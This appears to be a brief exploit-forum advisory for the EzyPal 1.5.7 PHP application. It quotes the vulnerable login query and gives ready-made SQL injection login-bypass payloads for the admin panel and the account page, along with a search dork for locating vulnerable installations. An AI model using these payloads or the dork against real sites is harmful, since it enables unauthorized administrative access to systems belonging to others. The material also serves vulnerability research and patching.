Author: ~!Dok_tOR!~ Product: EzyPal Version: 1.5.7 возможно и более ранние версии URL: www.ezypal.com Vulnerability Class: SQL injection 1. /[installdir]/admincp/index.php Vuln Code: PHP: $sql = mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error()); magic_quotes_gpc = Off Example: http://[server]/[installdir]/admincp/index.php Email Address: 1' or 1=1/* Password: 1' or 1=1/* 2. Example: http://[server]/[installdir]/index.php?do=account Email Address: 1' or 1=1/* Password: 1' or 1=1/* Dork: Powered by EzyPal Welcome :: EzyPal
